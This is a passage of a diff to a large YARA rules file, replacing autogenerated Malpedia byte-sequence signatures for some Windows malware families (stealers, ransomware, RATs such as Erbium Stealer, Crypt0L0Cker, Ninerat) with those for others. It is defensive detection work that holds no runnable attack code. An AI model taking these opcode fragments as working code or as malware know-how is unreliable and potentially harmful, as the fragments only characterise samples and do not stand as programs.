-		$sequence_2 = { 8b94243c010000 83c40c 89542418 8d842434010000 8d5001 }
-		$sequence_3 = { 51 c744243810000000 896c2440 897c2444 897c2448 }
-		$sequence_4 = { 6a00 51 e8???????? b941000000 }
-		$sequence_5 = { 8d442418 50 68fc030000 8d4c2424 }
-		$sequence_6 = { 68ffff0000 52 ff15???????? 8b3d???????? 6a02 68???????? be0b000000 }
-		$sequence_7 = { 6bf628 03348540580110 8b45e4 8b00 8906 }
-		$sequence_8 = { 5d c3 56 57 33ff 8db7403e0110 ff36 }
-		$sequence_9 = { 896c2440 897c2444 897c2448 897c244c 895c2450 ffd6 }
+		$sequence_0 = { f20f11442430 c744242821000000 8364242000 488d0de0360100 ba0d000000 e8???????? e9???????? }
+		$sequence_1 = { e8???????? be06000000 448d4601 85c0 7843 83f801 0f8e3b010000 }
+		$sequence_2 = { e9???????? 413bfc 0f84c7000000 41be20000000 eb09 413bfc 0f84b6000000 }
+		$sequence_3 = { 83f9ff 0f9dc0 85c0 7431 f20f1015???????? f20f5cd6 f20f5915???????? }
+		$sequence_4 = { f30f7f00 f3410f7f0b 4883c010 4983eb10 493bc3 72e3 }
+		$sequence_5 = { 8d43a0 894550 e8???????? 4c8b7de0 8bd8 85c0 0f851effffff }
+		$sequence_6 = { b9bb0b0000 e8???????? 418bc7 4585ed 7e10 488d4dff 8801 }
+		$sequence_7 = { 744c 83f808 0f8483000000 83f81b 7564 4983c202 4983e802 }
+		$sequence_8 = { 48896c2410 4889742418 57 4883ec20 488b4118 488be9 488bfa }
+		$sequence_9 = { ff15???????? 8bd8 85c0 74a8 83f826 0f8521010000 448b442450 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1302528
 }
-rule MALPEDIA_Win_Stormwind_Auto : FILE
+rule MALPEDIA_Win_Screencap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "80614d8b-8924-5b45-b8c5-f7daeb22acc2"
+		id = "c09ded30-7ed9-5627-bd4b-b5b9719d1b79"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stormwind_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.screencap_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "1831a86c13bffd90b9334f0a5afcc717f00e9aac3ae8337459965aab192d5d98"
+		logic_hash = "fe7ef238cffaf8f0702b709313aa3e525535b37ee9076ff1908a7fc171fcfe6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118271,32 +118713,32 @@ rule MALPEDIA_Win_Stormwind_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff5004 8b36 3b37 75eb 68f4010000 8d4708 }
-		$sequence_1 = { f30f6f40e0 660ff9c1 f30f7f4407e0 3b55f4 7cd5 8b7df0 3bd6 }
-		$sequence_2 = { 83c40c eb02 33ff ff7508 }
-		$sequence_3 = { 6a00 8906 e8???????? 8945d0 8d45d0 50 }
-		$sequence_4 = { c20400 55 8bec 668b4d0e baf07f0000 668bc1 }
-		$sequence_5 = { e8???????? 8d4df0 83c404 3bc8 7408 8b30 }
-		$sequence_6 = { 4a 8955fc 81fa00010000 7309 0fb6b2e0f90310 eb0c 8bca }
-		$sequence_7 = { 64a300000000 8bf9 897c241c 8b471c 8b08 }
-		$sequence_8 = { 85db 7410 ff75e8 6a00 53 e8???????? }
-		$sequence_9 = { 8d45f4 64a300000000 8bf9 8d4dec c745e400000000 e8???????? c745fc00000000 }
+		$sequence_0 = { 8b4c2444 4183ec28 894804 8b4c2448 488bf8 6689580c }
+		$sequence_1 = { 4c8d0dee6d0100 4c8d0567120100 ba00080000 488bc8 48c744242000000000 e8???????? 85c0 }
+		$sequence_2 = { d1f8 7423 66837c46fe5c 741b 403bc5 7316 }
+		$sequence_3 = { 488bc8 4c8be0 ff15???????? 488b15???????? 33c0 }
+		$sequence_4 = { 488d0da7e70000 488b0cc1 44897c2444 4c8b7c2460 498b0c0f 4c8d4c2448 }
+		$sequence_5 = { 418d4b06 410fb7c3 44895d0c 4c895d04 66f3ab 488d3ddebb0000 }
+		$sequence_6 = { 7406 484a85c0 7fcc 66892c57 }
+		$sequence_7 = { 488d152ccb0000 e9???????? 488d1510cb0000 eb7c 488d15f7ca0000 eb73 488d15deca0000 }
+		$sequence_8 = { 8b7214 3b7204 7204 33c0 }
+		$sequence_9 = { 50 8b442438 4850 e8???????? 50 }
 
 	condition:
-		7 of them and filesize < 741376
+		7 of them and filesize < 1391616
 }
-rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
+rule MALPEDIA_Win_Flame_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a53e6ef-1078-5435-9f60-4f8ff6596d6b"
+		id = "b53c0a2c-8618-5e74-aa3e-ccb8cf016906"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.erbium_stealer_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flame_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "bccad5f3f8af9dfd7831cb14cdc529eb8f240bee1d54dd0908880ec160a26124"
+		logic_hash = "0f55b9dade05164e67ff141163e2392fbdf01e6db384f40da8132a7d5263b81a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118310,34 +118752,39 @@ rule MALPEDIA_Win_Erbium_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66833800 75f7 668b4c2450 6685c9 7418 }
-		$sequence_1 = { 8b4db8 83c102 51 8b55d0 52 }
-		$sequence_2 = { 50 8b4dec 8b55f8 03510c }
-		$sequence_3 = { 83c208 8955e0 c745dc00000000 eb12 8b45dc }
-		$sequence_4 = { 0f1f4000 8a10 0fbef2 80ea41 8bce }
-		$sequence_5 = { 894588 89458c 894590 6a00 6a18 8d8d7cffffff }
-		$sequence_6 = { 52 ff55fc 32c0 e9???????? 6a00 6800100000 68???????? }
-		$sequence_7 = { 68???????? 8b4df4 51 ff15???????? 8945ac 68???????? 8b55f4 }
-		$sequence_8 = { 660f1f440000 40 80b84820400000 75f6 51 }
-		$sequence_9 = { 85c0 753d 6800800000 6a00 8b55f8 52 8b4508 }
+		$sequence_0 = { 85c9 741a 83f901 7415 e8???????? }
+		$sequence_1 = { 7426 488d4def e8???????? 90 }
+		$sequence_2 = { 7424 448865dc 41c1ec08 488d55dc }
+		$sequence_3 = { 395d0c 0f84e6020000 3bc3 0f84f7020000 83f803 7251 8b4648 }
+		$sequence_4 = { 7426 4883fa18 7420 4883fa20 }
+		$sequence_5 = { 833e0b 7506 c7060c000000 8b420c 8b4a10 8365dc00 }
+		$sequence_6 = { 894678 8b4670 894664 c7466002000000 3bd3 7476 }
+		$sequence_7 = { c645fc01 85c9 740a ff7508 e8???????? eb02 33c0 }
+		$sequence_8 = { 85c0 7423 8b5500 498bcd }
+		$sequence_9 = { 7424 488b0b 4533c9 448bc6 488bd5 48897c2428 }
+		$sequence_10 = { 8b90b0000000 4903d3 eb64 448bc0 }
+		$sequence_11 = { 50 e8???????? 59 895e0c 885dfc 8b4604 3bc3 }
+		$sequence_12 = { 8365fc00 8b4d08 c700???????? 89480c 834dfcff 8b4df4 }
+		$sequence_13 = { 56 8b7006 85f6 7525 50 8d4dc8 }
+		$sequence_14 = { 7424 488b4b08 8b45d0 482b0b }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 1676288
 }
-rule MALPEDIA_Win_Pickpocket_Auto : FILE
+rule MALPEDIA_Win_Pushdo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a83df77-97f7-5782-8335-b4e0f4f4d0cb"
+		id = "b6d886fe-4960-5326-a389-c445ba8e11b5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pickpocket_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pushdo_auto.yar#L1-L204"
 		license_url = "N/A"
-		logic_hash = "b44df7bc5acbc6d7badbaaac3695700d24536089857d9464cd11f3048d47faf5"
+		logic_hash = "31b4c4806bd17184721cedae96bf0c20e18e459a29e411d56b72098b9cc5e475"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118349,34 +118796,45 @@ rule MALPEDIA_Win_Pickpocket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0c b96ccb0000 eb05 b960cb0000 e8???????? }
-		$sequence_1 = { b97dcb0000 eb0c b96ccb0000 eb05 b960cb0000 e8???????? eb02 }
-		$sequence_2 = { 750f b962890100 e8???????? e9???????? }
-		$sequence_3 = { 750f b93eaf0000 e8???????? e9???????? }
-		$sequence_4 = { eb05 b960cb0000 e8???????? eb02 33c0 }
-		$sequence_5 = { 750e b958de0100 e8???????? 8bc8 }
-		$sequence_6 = { 750f b91f220100 e8???????? e9???????? }
-		$sequence_7 = { 741a b97dcb0000 eb0c b96ccb0000 eb05 }
-		$sequence_8 = { 33c0 eb0a b952ca0000 e8???????? }
-		$sequence_9 = { 3bc7 760a b988d30000 e9???????? }
+		$sequence_0 = { 50 ff15???????? 33d2 b9ffff0000 }
+		$sequence_1 = { f7f9 33c9 ba88020000 f7e2 0f90c1 f7d9 }
+		$sequence_2 = { 8b45fc b10b d3c0 61 }
+		$sequence_3 = { 2bd0 8b4df8 83c101 894df8 81faff000000 }
+		$sequence_4 = { 0fbe8c0df0feffff 33d1 8b450c 0345fc }
+		$sequence_5 = { 6800010000 6a00 8d85f0feffff 50 e8???????? 83c40c 8d8df0feffff }
+		$sequence_6 = { 888c15f0feffff 8b55fc 8a85effeffff 888415f0feffff eb84 c785e8feffff00000000 }
+		$sequence_7 = { 8d8df0feffff 894df8 c685effeffff00 8b55f8 8d85f0feffff 2bd0 }
+		$sequence_8 = { 50 53 889dfcfeffff ff15???????? 48 3d02010000 7719 }
+		$sequence_9 = { 8d8588f8ffff 52 68???????? 50 ff15???????? }
+		$sequence_10 = { 5b ff75fc ff15???????? 5e 8b45f8 5f }
+		$sequence_11 = { 8b1d???????? ff7634 ff75ec ffd3 8945e8 3bc7 }
+		$sequence_12 = { 7d02 33ff 8b45f0 c1e006 }
+		$sequence_13 = { 52 8d8588fbffff 50 e8???????? }
+		$sequence_14 = { 8b5508 0fb7444a02 85c0 750b }
+		$sequence_15 = { 6a20 8d55b8 52 6a00 }
+		$sequence_16 = { 8bec 8b4508 83781800 7408 8b4d08 8b4118 }
+		$sequence_17 = { c745ec00000000 837de400 0f8e06010000 8b550c 0fbe02 }
+		$sequence_18 = { 8945d0 8b4dd0 51 ff55e8 }
+		$sequence_19 = { 894dfc eb83 8b5508 8b02 8945f4 }
+		$sequence_20 = { 2b45fc 83f805 7307 33c0 e9???????? }
 
 	condition:
-		7 of them and filesize < 1458176
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Synccrypt_Auto : FILE
+rule MALPEDIA_Win_Chinotto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0acfe97-1049-5df6-8be2-e1920c7563c7"
+		id = "0573d972-e907-5e4b-a894-f42d60689ebb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.synccrypt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinotto_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "36fed86930a547a043d213272378804045281c22493a08490f720ea6d556929c"
+		logic_hash = "7b0ad7ae03649166d50ba1fc6b2d39b3f99f903efd2a6958d5ba06fcea9fb997"
 		score = 75
-		quality = 45
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118388,32 +118846,32 @@ rule MALPEDIA_Win_Synccrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7442404???????? 892c24 e8???????? 85c0 0f8efdfdffff 83bc240c010000ff 8b442450 }
-		$sequence_1 = { c744240491000000 c7042422000000 e8???????? 8b4508 c7442414cb2d5900 89442418 8b4504 }
-		$sequence_2 = { c7442404???????? 891424 894c2448 e8???????? 85c0 8944243c 8b4c2448 }
-		$sequence_3 = { e8???????? 8d8d4832fcff e8???????? 8b85e02afcff 890424 e8???????? 8b85dc2afcff }
-		$sequence_4 = { 89442434 83c420 5b 5e 5f e9???????? c74424109d000000 }
-		$sequence_5 = { c1ff1f c1fa02 89d3 bad34d6210 f7ea 29fb c1fa06 }
-		$sequence_6 = { 8d842480000000 890424 e8???????? 81c42c020000 31c0 5b 5e }
-		$sequence_7 = { 89442404 8b442420 8b4010 8b4014 83c014 890424 e8???????? }
-		$sequence_8 = { 893c24 e8???????? 8b442420 85c0 0f95442427 ebd0 8b460c }
-		$sequence_9 = { e8???????? 8b442434 c744240400000000 890424 e8???????? 8b842494000000 893424 }
+		$sequence_0 = { 8987f0e74100 83c704 83ff28 72e6 5f 5e c3 }
+		$sequence_1 = { 75ed 8b4e4c 894e50 c7473cc04a4000 eb06 }
+		$sequence_2 = { 894e0c 66c7065265 66c746026720 66c746045265 66c746066164 66c746082053 66c7460a7563 }
+		$sequence_3 = { 8b5ddc 3bdf 7426 f7460800000200 7424 83fa05 771f }
+		$sequence_4 = { 721d 8b4830 3b4834 7308 }
+		$sequence_5 = { 66894da6 b973000000 66894da8 b925000000 66894daa b973000000 }
+		$sequence_6 = { 897de8 3b7de4 0f8782010000 25ff7f0000 0fb61c02 8dbc318f000000 0fb63c07 }
+		$sequence_7 = { 8bec b810100000 e8???????? a1???????? 33c5 8945f8 8b4508 }
+		$sequence_8 = { 8b853cf7ffff 83c420 03d8 89b538f7ffff 85c0 758a 8b8534f7ffff }
+		$sequence_9 = { 56 52 50 8b4508 8b4834 8b5030 }
 
 	condition:
-		7 of them and filesize < 4489216
+		7 of them and filesize < 300032
 }
-rule MALPEDIA_Win_Avcrypt_Auto : FILE
+rule MALPEDIA_Win_Ninerat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00cf27fe-b3f2-52f3-b9ce-ac448ef85802"
+		id = "56fcbf79-427d-50d3-bca3-31de15eac399"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avcrypt_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ninerat_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "ff0922ac16f60a78ce69b391d1f6f13ac39e840f62a7ba24855ffe003dee4073"
+		logic_hash = "7c80943a7e234598d055453bf04aeb26119fa41707d1bc3f20d9f334282eb72d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118427,32 +118885,38 @@ rule MALPEDIA_Win_Avcrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7467 663bdf 7462 837e4000 7515 ff7650 57 }
-		$sequence_1 = { 57 56 8d4d38 e8???????? 57 56 8d4d50 }
-		$sequence_2 = { 85c9 0f88d9090000 8d42e0 3c58 770f 0fbec2 0fbe8058e34200 }
-		$sequence_3 = { e8???????? 59 0fb7c8 b8ffff0000 663bc8 0f8406010000 8bc1 }
-		$sequence_4 = { 7447 8802 42 8b048d80b54300 4e 807d1301 }
-		$sequence_5 = { 8d4d8c c645fc13 e8???????? 68???????? 8d4da4 c645fc14 }
-		$sequence_6 = { 75e2 8b7df4 8937 5e eb05 8b4510 }
-		$sequence_7 = { 895dfc 894dbc 895db8 668945a8 894dd4 895dd0 668945c0 }
-		$sequence_8 = { 8d45d8 0f4345d8 57 50 57 }
-		$sequence_9 = { 8bc6 e8???????? c20400 8b11 83c9ff 83ea10 8d420c }
+		$sequence_0 = { 4c8b45e0 4c3b45f0 734d 483b3e }
+		$sequence_1 = { 4c8b45e0 4c8945f0 4c8b4de8 4c894df8 4c8d45f0 }
+		$sequence_2 = { 4c89b570ffffff 4c89bd78ffffff 48894d10 4889d3 4d89c4 4d89cd 4883ec08 }
+		$sequence_3 = { 4c8b45e8 4889d9 e8???????? 488b5dd8 488b75e0 488be5 }
+		$sequence_4 = { 4c898dd0feffff 4c8bce 4c8b8500ffffff bac9090000 }
+		$sequence_5 = { 4c8b45e0 49c1e004 4c0345e8 4c39c6 72a8 31c0 488b5dc0 }
+		$sequence_6 = { 4c8b45e0 488b55f0 488b4de8 e8???????? }
+		$sequence_7 = { 4c8b45e8 488b4df8 e8???????? 4889c1 e8???????? }
+		$sequence_8 = { 0f84ac000000 e9???????? 4d8bb4f670300100 33d2 498bce 41b800080000 ff15???????? }
+		$sequence_9 = { 660fef8c24d0000000 66480f7ec8 69c895e9d15b 8bc1 c1e818 }
+		$sequence_10 = { 4d8be1 498be8 4c8bea 498b84ff70c20100 4983ceff 493bc6 0f84f9000000 }
+		$sequence_11 = { 488d0d85e80000 e8???????? 85c0 740a }
+		$sequence_12 = { 81fae9fd0000 0f8582010000 4c8d3d0c21ffff 418bd2 4d8b8cc7f0c60100 498bfa 4b8d04f1 }
+		$sequence_13 = { 660fef842420030000 660f7f842480000000 488d8c2480000000 ffd2 4c896c2450 }
+		$sequence_14 = { 3de4000000 7311 4898 488d0d025b0000 4803c0 8b04c1 eb02 }
+		$sequence_15 = { e8???????? 4c896c2450 488b442450 4889842430010000 }
 
 	condition:
-		7 of them and filesize < 6160384
+		7 of them and filesize < 7709696
 }
-rule MALPEDIA_Win_Sykipot_Auto : FILE
+rule MALPEDIA_Win_Ratankbapos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7dfa6014-8de4-5034-9d3e-e952369ddc5e"
+		id = "d1e7d1d4-363b-5b45-848f-d4cc89843f97"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sykipot_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratankbapos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "6b98694b9b7bab0c760215e0200ed7148a92e1d0f8160cc9d832d1342f3407bf"
+		logic_hash = "17591f183be92d031983360942e373f37d5a48aae82c019ca5afd1168616aff1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118466,34 +118930,34 @@ rule MALPEDIA_Win_Sykipot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89842420030000 b93e000000 33c0 8dbc2424030000 f3ab ff15???????? 50 }
-		$sequence_1 = { f3a4 ffd3 83c408 a3???????? 85c0 }
-		$sequence_2 = { 8d8c2418030000 68???????? 51 ffd7 83c408 85c0 }
-		$sequence_3 = { 68???????? 68???????? 8bf0 ffd5 83c414 3bc3 }
-		$sequence_4 = { 8bcd 4f c1e902 f3a5 8bcd 8d842488000000 }
-		$sequence_5 = { 895304 8bd7 895308 8bd4 8902 }
-		$sequence_6 = { 52 68f3010000 50 56 ffd7 85c0 74ae }
-		$sequence_7 = { 8b44241c 85c0 0f84c8000000 55 50 }
-		$sequence_8 = { f3ab 8b0d???????? a1???????? 898c2418030000 89842420030000 b93e000000 }
-		$sequence_9 = { 6a00 8d842414020000 6a1a 50 6a00 ff15???????? }
+		$sequence_0 = { 8d0cfd484a0110 8b11 3b55e0 7408 48 83e908 }
+		$sequence_1 = { 83c40c 6800100000 53 56 }
+		$sequence_2 = { 8b0c8de04d0110 c1e006 0fbe440104 83e040 5d c3 a1???????? }
+		$sequence_3 = { 83e01f c1f905 8b0c8de04d0110 c1e006 8d440104 800820 8b4df4 }
+		$sequence_4 = { c6040800 8b55a0 52 8945c4 e8???????? 8b4da4 8945c8 }
+		$sequence_5 = { ff15???????? 8b55c4 52 894314 }
+		$sequence_6 = { 4f 8a4f01 47 84c9 75f8 8b95f4dfffff 8bc8 }
+		$sequence_7 = { e8???????? 59 59 8b7508 8d34f5303c0110 391e }
+		$sequence_8 = { 56 e8???????? 8d0445c4420110 8bc8 }
+		$sequence_9 = { 8bc1 8da42400000000 8a10 3a11 751a 84d2 7412 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Ketrican_Auto : FILE
+rule MALPEDIA_Win_Roseam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "439971d8-746c-55ae-9bfc-c8ec84b9bdc0"
+		id = "5720401d-650c-5ffa-937c-009deb00b79f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ketrican_auto.yar#L1-L232"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.roseam_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "bd65d425e881a2f25fb5439fad465d4c0696f8064b1ba4643c58eae4b61b8ee6"
+		logic_hash = "6405b276e56fbb6391489a72f41f1ba4fb7da1db3c06ee822f393f99823911b5"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118505,45 +118969,32 @@ rule MALPEDIA_Win_Ketrican_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8965f0 33db 895dfc 33c0 }
-		$sequence_1 = { 8906 c3 56 8bf1 57 8bf8 }
-		$sequence_2 = { 7505 e8???????? 83c010 8906 c3 56 }
-		$sequence_3 = { 8bc1 8945f0 834dfcff e8???????? }
-		$sequence_4 = { 8901 5b 5d c20800 680e000780 }
-		$sequence_5 = { 8b06 5d c20400 55 8bec 8b4508 }
-		$sequence_6 = { cc 8b06 83e810 8b08 395008 7d13 85d2 }
-		$sequence_7 = { 680e000780 e8???????? cc 8b06 }
-		$sequence_8 = { 6a66 58 668945d8 6a72 58 668945da }
-		$sequence_9 = { e8???????? 8b7d0c 83c40c 8bc7 }
-		$sequence_10 = { 6a69 58 668945d4 6a65 58 668945d6 6a66 }
-		$sequence_11 = { 33ff 8bd8 897d0c 85db 7e13 }
-		$sequence_12 = { 6a01 e8???????? 59 59 e8???????? 8bf0 }
-		$sequence_13 = { 5e 5d c3 ff25???????? 6aff 50 }
-		$sequence_14 = { 668945e6 668945e8 33c0 668945ea c745ec08020000 }
-		$sequence_15 = { 0f840c000000 8365d4fe 8d4da4 e9???????? c3 8d4dbc e9???????? }
-		$sequence_16 = { 8d420c 8b4ae8 33c8 e8???????? 8b8a4c010000 33c8 }
-		$sequence_17 = { 68???????? c705????????98824100 a3???????? c605????????00 e8???????? 59 c3 }
-		$sequence_18 = { e8???????? 8b8a4c010000 33c8 e8???????? b8???????? e9???????? }
-		$sequence_19 = { 33c8 e8???????? 8b8a8c2f0000 33c8 e8???????? b8???????? e9???????? }
-		$sequence_20 = { 8b8a38ffffff 33c8 e8???????? 8b8ae8060000 }
-		$sequence_21 = { b8???????? e9???????? 8d45d0 e9???????? 8d4dd0 e9???????? 8d4de0 }
-		$sequence_22 = { e9???????? 8b4508 e9???????? 8b45ec }
+		$sequence_0 = { 0f8512010000 33f6 b963000000 8dbd76ecffff 6689b574ecffff f3ab }
+		$sequence_1 = { 681de40a18 56 e8???????? 83c408 a3???????? 50 }
+		$sequence_2 = { 3bda 895df0 895508 8955f8 aa 0f8e8a040000 8b4510 }
+		$sequence_3 = { 9d 5d 58 33c0 668945fd 8845ff }
+		$sequence_4 = { 50 51 52 c745fc00000000 ff15???????? 85c0 0f8504020000 }
+		$sequence_5 = { 80c241 8855ff 68???????? 55 }
+		$sequence_6 = { 894df8 8b4d10 2bc8 8d5004 894d10 8b4dfc 89550c }
+		$sequence_7 = { 53 56 57 8b02 8945f8 50 }
+		$sequence_8 = { 58 8bc2 5f 5e }
+		$sequence_9 = { 668901 0fbe560c 89550c 68???????? }
 
 	condition:
-		7 of them and filesize < 1449984
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Laturo_Auto : FILE
+rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81276e33-698e-507e-b345-8c9c243babc3"
+		id = "e6b39d07-e23b-5484-8b7e-294315d68726"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.laturo_auto.yar#L1-L170"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crypt0l0cker_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3a95665a0f62c0e6d122fab4ca77fec299db1ff67fd03f39a710232d9c73dd0f"
+		logic_hash = "11804f6d364478c710393f9e456002818242d521693fa2a4f73173b108217067"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118557,40 +119008,34 @@ rule MALPEDIA_Win_Laturo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d0568000000 488d15d9380100 488d0de2380100 e8???????? 4c8d0d6e730100 4c8d0567010000 }
-		$sequence_1 = { 0f8592000000 0fb6442420 4883f802 7332 }
-		$sequence_2 = { 4c8d0db0860000 8bf9 488d15a7860000 b906000000 4c8d0593860000 }
-		$sequence_3 = { 750b 0fb6442406 d0e0 88442406 0fb6442405 }
-		$sequence_4 = { 880424 0fb60424 89442448 488b442410 48ffc0 4889442410 }
-		$sequence_5 = { 48034a10 488bf9 488b742478 8bc8 }
-		$sequence_6 = { 488b442410 48ffc0 4889442410 0fb6442402 83e040 85c0 743d }
-		$sequence_7 = { 4d8be1 498be8 4c8bea 4b8b8cfee89f0100 4c8b15???????? 4883cfff }
-		$sequence_8 = { a1???????? 33d2 56 57 8bf9 8bf7 }
-		$sequence_9 = { eb21 886a01 b002 eb1a 886a02 b020 }
-		$sequence_10 = { 8b35???????? 8d45dc 6a1c 50 }
-		$sequence_11 = { 80fb90 7405 80fbcc 7520 b801000000 3bd0 7610 }
-		$sequence_12 = { 8b550c 83ec20 33c9 8bc1 3914c5f81b0110 7408 40 }
-		$sequence_13 = { 0fb6c0 83e800 741f 83e801 }
-		$sequence_14 = { 814a1800100100 8a65fd eb0e 8a65fd }
-		$sequence_15 = { 56 57 ff15???????? 894514 85c0 784d 83ff05 }
+		$sequence_0 = { 744f 83ff73 7516 83fb09 7209 83fb0d 0f865d040000 }
+		$sequence_1 = { 8bcb e8???????? 8b7dfc 59 8d7708 56 ff15???????? }
+		$sequence_2 = { b801000000 5b 81c484000000 c3 5f 8bc6 5e }
+		$sequence_3 = { 8bbd20fdffff 59 59 83bdf8fcffff00 7417 8b8d2cfdffff 8bc1 }
+		$sequence_4 = { 33d2 898524fdffff 899d34fdffff 898d10fdffff c785e0fcffff5e010000 8995e4fcffff 8995dcfcffff }
+		$sequence_5 = { 42 33db 03fa 3bfa 6a01 58 0f42d8 }
